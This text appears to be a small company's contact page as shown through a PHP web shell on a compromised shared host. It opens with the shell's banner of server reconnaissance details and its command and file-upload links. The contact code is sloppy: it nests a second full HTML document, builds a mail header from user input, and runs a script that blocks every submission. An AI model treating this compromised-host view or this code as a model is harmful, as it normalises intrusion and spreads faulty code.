|
Server IP : 45.113.226.95 / Your IP : 216.73.216.239 Web Server : LiteSpeed System : Linux bharat.hostitbro.com 5.14.0-611.13.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 11 04:57:59 EST 2025 x86_64 User : digita21 ( 1701) PHP Version : 8.3.30 Disable Function : mail MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF Directory (0750) : /home2/digita21/jigmartechnology.in/.well-known/../ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!doctype html>
<html lang="en">
<meta http-equiv="content-type" content="text/html;charset=UTF-8" />
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="viewport" content="width=device-width, initial-scale=1.0 user-scalable=no" />
<title>Jigmar Technology </title>
<link rel="shortcut icon" type="image/x-icon" href="">
<link href="assets/css/theme-plugins.min.css" rel="stylesheet">
<link href="assets/css/style.css" rel="stylesheet">
<link href="assets/css/responsive.css" rel="stylesheet">
<link rel="stylesheet" type="text/css" href="assets/revolution/css/layers.css">
<link rel="stylesheet" type="text/css" href="assets/revolution/css/navigation.css">
<link rel="stylesheet" type="text/css" href="assets/revolution/css/settings.css">
<link rel="stylesheet" type="text/css" href="assets/revolution/fonts/pe-icon-7-stroke/css/pe-icon-7-stroke.css">
<link rel="stylesheet" type="text/css" href="assets/revolution/fonts/font-awesome/css/font-awesome.css">
</head>
<style>
body {
background: linear-gradient(to right, #f9f9f9, #e3f2fd);
}
.contact-section {
padding: 60px 20px;
}
.contact-card {
border-radius: 20px;
box-shadow: 0 8px 30px rgba(0, 0, 0, 0.1);
padding: 40px;
background-color: #fff;
}
.form-control {
border-radius: 10px;
}
.btn-custom {
background-color: black;
color: white;
border-radius: 50px;
padding: 10px 30px;
font-weight: bold;
transition: all 0.3s ease;
}
.btn-custom:hover {
background-color: #0056b3;
}
.button-down{
background-color: black;
}
@keyframes floatY {
0% { transform: translateY(0px); }
50% { transform: translateY(-15px); }
100% { transform: translateY(0px); }
}
.float-animation {
animation: floatY 3s ease-in-out infinite;
}
</style>
<body>
<?php
include (
"header.php"
)
?>
<img class="img-fluid w-100" src="assets/img/contact-us-banner1.png" alt="">
<section class="contact-section">
<div class="container">
<div class="row justify-content-center text-center mb-5">
<div class="col-lg-8">
<h2 class="fw-bold text-success">GET IN TOUCH</h2>
<p class="text-muted">We'd love to hear from you. Please fill out the form below.</p>
</div>
</div>
<div class="row align-items-center">
<!-- Left: Image -->
<div class="col-lg-6 mb-4 mb-lg-0">
<img src="assets/img/contact-first-img2.png" class="img-fluid rounded float-animation" alt="Contact Us Image">
</div>
<!-- Right: Contact Form -->
<div class="col-lg-6">
<div class="contact-card">
<?php
$success = "";
$error = "";
if ($_SERVER["REQUEST_METHOD"] === "POST") {
$name = htmlspecialchars(trim($_POST["name"]));
$email = filter_var(trim($_POST["email"]), FILTER_SANITIZE_EMAIL);
$subject = htmlspecialchars(trim($_POST["subject"]));
$message = htmlspecialchars(trim($_POST["message"]));
if (empty($name) || empty($email) || empty($subject) || empty($message) || !filter_var($email, FILTER_VALIDATE_EMAIL)) {
$error = "Please fill out all fields correctly.";
} else {
$to = "jigmartech@gmail.com";
$email_subject = "New Contact Form Submission: $subject";
$email_body = "You have received a new message from your website contact form:\n\n" .
"Name: $name\n" .
"Email: $email\n" .
"Subject: $subject\n" .
"Message:\n$message";
$headers = "From: $name <$email>\r\n";
$headers .= "Reply-To: $email\r\n";
if (mail($to, $email_subject, $email_body, $headers)) {
$success = "Your message has been sent successfully!";
} else {
$error = "Something went wrong. Please try again.";
}
}
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Contact Form</title>
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
</head>
<body>
<div class="container mt-5" style="max-width: 600px;">
<h2 class="mb-4 text-center">Contact Us</h2>
<?php if (!empty($success)): ?>
<div class="alert alert-success text-center"><?php echo $success; ?></div>
<?php endif; ?>
<?php if (!empty($error)): ?>
<div class="alert alert-danger text-center"><?php echo $error; ?></div>
<?php endif; ?>
<form id="contactForm" method="POST" novalidate>
<div class="mb-3">
<label for="name" class="form-label">Full Name</label>
<input type="text" class="form-control" id="name" name="name" required>
<div class="invalid-feedback">Please enter your name.</div>
</div>
<div class="mb-3">
<label for="email" class="form-label">Email address</label>
<input type="email" class="form-control" id="email" name="email" required>
<div class="invalid-feedback">Please enter a valid email.</div>
</div>
<div class="mb-3">
<label for="subject" class="form-label">Subject</label>
<input type="text" class="form-control" id="subject" name="subject" required>
<div class="invalid-feedback">Please enter a subject.</div>
</div>
<div class="mb-3">
<label for="message" class="form-label">Message</label>
<textarea class="form-control" id="message" name="message" rows="5" required></textarea>
<div class="invalid-feedback">Please enter your message.</div>
</div>
<div class="text-center">
<button type="submit" class="btn btn-primary">Send Message</button>
</div>
</form>
</div>
<script>
// Optional: Bootstrap client-side validation
(() => {
'use strict';
const forms = document.querySelectorAll('form');
Array.from(forms).forEach(form => {
form.addEventListener('submit', event => {
if (!form.checkValidity()) {
event.preventDefault();
event.stopPropagation();
}
form.classList.add('was-validated');
}, false);
});
})();
</script>
</body>
</html>
</div>
</div>
</div>
</div>
</section>
<?php
include("footer.php")
?>
<script>
// Bootstrap validation
(() => {
const form = document.getElementById('contactForm');
form.addEventListener('submit', function (event) {
if (!form.checkValidity()) {
event.preventDefault();
event.stopPropagation();
} else {
event.preventDefault();
alert("Message sent successfully!");
form.reset();
}
form.classList.add('was-validated');
}, false);
})();
</script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.3/dist/js/bootstrap.bundle.min.js"></script>
<a id="mkdf-back-to-top" href="#" class="off"><i class="icofont-rounded-up"></i></a>
<script data-cfasync="false" src="cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script>
<script data-cfasync="false" src="cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script>
<script src="assets/js/jquery.min.js"></script>
<script src="assets/js/theme-plugins.min.js"></script>
<script src="assets/js/site-custom.js"></script>
<script type="text/javascript" src="assets/revolution/js/jquery.themepunch.tools.min.js"></script>
<script type="text/javascript" src="assets/revolution/js/jquery.themepunch.revolution.min.js"></script>
<script type="text/javascript" src="assets/revolution/js/extensions/revolution.extension.actions.min.js"></script>
<script type="text/javascript" src="assets/revolution/js/extensions/revolution.extension.carousel.min.js"></script>
<script type="text/javascript" src="assets/revolution/js/extensions/revolution.extension.kenburn.min.js"></script>
<script type="text/javascript"
src="assets/revolution/js/extensions/revolution.extension.layeranimation.min.js"></script>
<script type="text/javascript" src="assets/revolution/js/extensions/revolution.extension.migration.min.js"></script>
<script type="text/javascript" src="assets/revolution/js/extensions/revolution.extension.navigation.min.js"></script>
<script type="text/javascript" src="assets/revolution/js/extensions/revolution.extension.parallax.min.js"></script>
<script type="text/javascript" src="assets/revolution/js/extensions/revolution.extension.slideanims.min.js"></script>
<script type="text/javascript" src="assets/revolution/js/extensions/revolution.extension.video.min.js"></script>
<script type="text/javascript">
var tpj = jQuery;
var revapi26;
tpj(document).ready(function () {
if (tpj("#rev_slider_26_1").revolution == undefined) {
revslider_showDoubleJqueryError("#rev_slider_26_1");
} else {
revapi26 = tpj("#rev_slider_26_1").show().revolution({
sliderType: "standard",
jsFileLocation: "revolution/js/",
sliderLayout: "fullscreen",
dottedOverlay: "none",
delay: 9000,
navigation: {
keyboardNavigation: "off",
keyboard_direction: "horizontal",
mouseScrollNavigation: "off",
mouseScrollReverse: "default",
onHoverStop: "off",
touch: {
touchenabled: "on",
touchOnDesktop: "off",
swipe_threshold: 75,
swipe_min_touches: 1,
swipe_direction: "horizontal",
drag_block_vertical: false
}
,
arrows: {
style: "metis",
enable: true,
hide_onmobile: true,
hide_under: 778,
hide_onleave: false,
tmp: '',
left: {
h_align: "left",
v_align: "center",
h_offset: 15,
v_offset: 0
},
right: {
h_align: "right",
v_align: "center",
h_offset: 15,
v_offset: 0
}
}
,
bullets: {
enable: true,
hide_onmobile: false,
style: "zeus",
hide_onleave: false,
direction: "horizontal",
h_align: "center",
v_align: "bottom",
h_offset: 0,
v_offset: 30,
space: 5,
tmp: ''
}
},
responsiveLevels: [1240, 1024, 778, 480],
visibilityLevels: [1240, 1024, 778, 480],
gridwidth: [1240, 1024, 778, 480],
gridheight: [868, 768, 960, 300],
lazyType: "none",
parallax: {
type: "scroll",
origo: "slidercenter",
speed: 2000,
levels: [5, 10, 15, 20, 25, 30, 35, 40, 45, 46, 47, 48, 49, 50, 51, 55],
},
shadow: 0,
spinner: "spinner0",
stopLoop: "off",
stopAfterLoops: -1,
stopAtSlide: -1,
shuffle: "off",
autoHeight: "on",
fullScreenAutoWidth: "off",
fullScreenAlignForce: "off",
fullScreenOffsetContainer: "",
fullScreenOffset: "0px",
hideThumbsOnMobile: "off",
hideSliderAtLimit: 0,
hideCaptionAtLimit: 0,
hideAllCaptionAtLilmit: 0,
debugMode: false,
fallbacks: {
simplifyAll: "off",
nextSlideOnWindowFocus: "off",
disableFocusListener: false,
}
});
}
}); /*ready*/
</script>
<script defer
src="https://static.cloudflareinsights.com/beacon.min.js/v84a3a4012de94ce1a686ba8c167c359c1696973893317"
integrity="sha512-euoFGowhlaLqXsPWQ48qSkBSCFs3DPRyiwVu3FjR96cMPx+Fr+gpWRhIafcHwqwCqWS42RZhIudOvEI+Ckf6MA=="
data-cf-beacon='{"rayId":"85d6f6bcead0495b","version":"2024.2.4","r":1,"token":"64224fc8786846928480d180dfc466bd","b":1}'
crossorigin="anonymous"></script>
</body>
<!-- Mirrored from mannatstudio.com/html/pethund/index.html by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 01 Mar 2024 06:07:17 GMT -->
<!-- Mirrored from unosafeelevator.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 05 May 2025 05:08:06 GMT -->
</html>